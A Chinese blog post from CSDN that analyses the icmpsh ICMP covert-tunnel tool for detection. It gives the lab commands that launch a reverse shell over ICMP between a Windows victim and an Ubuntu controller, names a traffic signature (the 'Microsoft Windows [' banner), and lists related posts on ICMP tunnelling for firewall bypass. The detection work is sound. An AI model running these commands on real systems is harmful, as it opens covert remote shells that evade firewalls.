ICMP隐蔽隧道工具--icmpsh流量特征检测分析

最新推荐文章于 2024-07-05 12:10:58 发布
最新推荐文章于 2024-07-05 12:10:58 发布
阅读量410 收藏 7
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36259703/article/details/135828241
版权

工具介绍

项目地址
https://github.com/bdamele/icmpsh
说明
分为客户端和服务端,其中客户端只支持在Windows中使用,服务端支持跨平台。
特点

  • C/S架构
  • 客户端使用非管理员权限

流量&逻辑分析

环境&测试准备

环境配置
控制端 Ubantu192.168.2.129
受控端 Win7 192.168.2.132
提前准备
正式使用前有一些注意事项需要提前准备一下,具体可参考链接
测试方式

  1. Windows运行命令

icmpsh.exe -t 192.168.2.129

image.png

  1. Ubantu运行命令

python2 icmpsh_m.py 192.168.2.129 192.168.2.132

image.png
成功获取shell(关于乱码问题,在windows使用chcp 65001修改一下在使用icmpsh即可)image.png

检测特征

image.png

Client逻辑分析

icmpsh的整体组成部分很简单,分为icmpsh-m.c和icmpsh-s.c
先看一下icmpsh-s.c的相关逻辑:
image.png
整体逻辑很简单,大致可以理解为调用ReadFile执行命令,结果发送给服务端,然后监听到新的命令之后,执行继续发送,没啥其他特殊的。
主要的特征是在transfer_icmp的调用过程中,无论服务端是否开启,都会发送类似

Microsoft Windows [版本 10.0.19045.3570]

的开头,中英文存在差异,但是前边的Microsoft Windows [是相同的。

Server逻辑分析

Server端逻辑也很简单,也主要是监听、发送功能,没啥特殊的。

whereGoAn
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
浅析Icmp原理及隐蔽攻击的方式
MSB_WLAQ的博客
10-13 2469
一、ICMP隧道技术解析 1.icmp协议 Internet Control Message Protocol Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用 ICMP协议主要提供两种功能, 一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。常见的差.
ICMP隐藏通信隧道技术
lonmar的博客
08-04 2108
文章目录简介icmpshPingTunnel实验一实验二Icmptunnel 简介 ICMP隧道简单实用,是一个比较特殊的协议.在一般的通信里,两台主机要进行通信必须开放端口.而ICMP协议就不需要. 最常见的ICMP协议就是ping命令的回复 常见的ICMP隧道工具icmpsh,PingTunnel,icmptunnel,powershell icmpICMP隧道搭建条件: 目标主机必须支持ICMP协议的进出 探测ICMP协议是否支持: 目标主机与攻击主机能够相互PING通即可 icmpsh i
ICMP隐蔽隧道实现--icmpsh
2202_75358230的博客
11-21 61
内部网络中的大多数系统位于防火墙和公司代理之后,以控制入站和出站流量。因此,可以将此协议用作隐蔽隧道,以便获得shell并在目标主机上远程执行命令。这样的话就直接pip2这个flask包 ,看准需要下载什么版本,直接install就行了。但是我们查端口的话是什么也查不到的,只能通过抓icmp包去发现数据传输。运行此工具时需要运行以下命令,禁用所有ICMP回显答复。第一个ip地址是自己的ip,第二个ip地址是目标主机。可以看出,明文传输,我们执行的命令被抓到了。之后解压缩此文件,并cd进去。
隐藏c2隧道---ICMPicmpsh的使用
qq_61142406的博客
02-12 3877
隐藏c2隧道---ICMPicmpsh的使用
ICMP隐蔽隧道攻击分析检测
2301_76725413的博客
07-28 580
进行隐蔽隧道传输的时候,被控端(防火墙内部)运行并接受外部攻击端的ICMP_ECHO数据包,攻击端把需要执行的命令隐藏在ICMP_ECHO数据包中,被控端接收到该数据包,解出其中隐藏的命令,并在防火墙内部主机上执行,再把执行结果隐藏在ICMP_ECHOREPLY数据包中,发送给外部攻击端。样本利用ICMP协议同C2进行通信,ICMP协议中的data字段可写入任意自定义数据,样本会将上线数据填充1024个字节放在ICMP协议的data字段,并且返回的ICMP数据包的data字段也是固定的1024个字节。
隐秘通信-使用PingTunnel搭建ICMP隧道实验
帮助别人等于帮助自己 ——MXi4oyu
08-09 509
Internet Control Message Protocol Internet控制报文协议,简称ICMP协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。CMP协议主要提供两种功能,一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。
【网络安全ICMP隐蔽隧道通信与检测
Sun_study的博客
01-17 1201
在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道,DNS隧道,正反向端口转发等)进行操作均失败。那么可以尝试使用ICMP建立隧道ICMP协议不需要端口的开放,因为其基于IP工作的,所以我们将其归结到网络层,ICMP消息最为常见的就是ping命令的回复,将TCP/UDP数据包封装到ICMP的ping数据包中,从而穿过防火墙**(通常防火墙是不会屏蔽ping数据包的)**
【内网流量操控技术六】icmp隧道icmpsh
redwand的博客
02-11 1575
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 2968
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
Wireshark-win64-2.9.0网路抓包数据分析工具
01-07
综上所述,Wireshark-win64-2.9.0是一款强大的网络分析工具,尤其在64位Windows环境下,它能够提供详尽的网络数据包捕获和分析功能,对于网络管理和故障排查至关重要。下载并安装"Wireshark-win64-2.9.0.exe"文件,...
TCP、UDP端口及ICMP网络扫描工具-网络安全代码类资源
02-04
基于vc6.0开发网络扫描工具,利用select+connect进行TCP端口扫描,利用ICMP端口不可达报文进行UDP端口扫描,可以完成对TCP、UDP端口的探测,ICMP你懂的。利用GetBestRoute和GetIpAddrTable来判定使用本地接口IP,不...
CTF-NetA V0.3.2 流量分析工具(自动提取flag)
02-21
CTF-NetA是一款专门针对CTF比赛的网络流量分析工具,可以对常见的网络流量进行分析和提取flag,而且还有UI,不需要使用者具备任何基础能力。 CTF-NetA具有以下功能: 检测明文和常规编码的flag文本 USB流量还原...
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
10-05
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
【网络安全】第3讲 消息认证技术(笔记)
最新发布
Elena's Blog
07-05 689
是报文鉴别码的一个变种。这个散列函数,又称哈希(Hash)函数,也称为指纹函数、杂凑函数、压缩函数... ...报文鉴别码需要使用对称密钥;散列函数不需要使用密钥。报文鉴别码是对全部数据进行加密,因此计算速度慢;散列函数是一种直接产生鉴别码的方法,因此计算速度快。报文鉴别码抵抗攻击的方法是,增加攻击者破解密钥的难度;散列函数抵抗攻击的方法是,增加攻击者找到碰撞的难度。用于保护通信双方免受第三方攻击无法防止通信双方的相互攻击报文宿方伪造报文报文源方否认已发送的报文。
GB/T22239-2019信息安全技术网络安全等级保护基本要求笔记
chaotiantian的博客
07-02 694
可基于可信根对边界设备的系统引导程序、系统程序、重要配置参数和边界防护应用程序等进行可信验证,并在检测到其可信性受到破坏后进行报警,并将验证结果形成审计记录送至安全管理中心。可基于可信根对通信设备的系统引导程序、系统程序、重要配置参数和通信应用程序等进行验证,并在检测到其可信性受到破坏后进行报警,并将验证结果形成审计记录送至安全管理中心。b)应通过系统管理员对系统的资源和运行进行配置、控制和管理,包括用户身份、系统资源配置、系统加载和启动、系统运行的异常处理、数据和设备的备份与恢复等。
印尼网络安全治理能力观察
网络研究观
07-05 681
这不是第一次,而且很可能也不会是最后一次。
人工智能对网络安全有何影响?
网络研究观
07-05 828
随着网络安全行业的不断发展,人工智能显然将成为防御和进攻策略的驱动力。
网络安全主动防御技术与应用
weixin_48579910的博客
07-05 775
入侵阻断技术是保护网络和系统免受各种网络攻击的关键措施。通过部署和配置NGFW、IDS/IPS、行为分析、网络隔离、恶意软件防护和零信任安全架构等技术,组织可以有效防御各种网络威胁。结合持续监控、定期评估和改进措施,可以增强整体网络安全性,保护关键资产和敏感数据。软件白名单技术是一种主动的安全措施,通过严格控制允许运行的应用程序,有效防止恶意软件和未经授权的软件执行。尽管管理复杂性较高,但其预防性和严格控制特性使其成为高安全性环境中的重要安全工具
adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT 的详细解释
06-13
```adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT``` 是一个修改 iptables 规则的命令,它的含义如下: - ```-A```:表示添加(append)一个新的规则到规则链的末尾。 - ```INPUT```:表示规则链的名称,该规则将被添加到输入规则链中。 - ```-p icmp```:表示该规则适用于 ICMP 协议。 - ```--icmp-type echo-request```:表示该规则匹配 ICMP 的 echo-request 消息,即 ping 请求。 - ```-j ACCEPT```:表示如果规则匹配,将执行 ACCEPT 操作,即允许流量通过。 因此,```adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT``` 命令将添加一个新的规则到输入规则链中,该规则将允许 ICMP 的 echo-request(ping 请求)通过防火墙。这将使得 Android 主机可以 ping 通其他主机。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值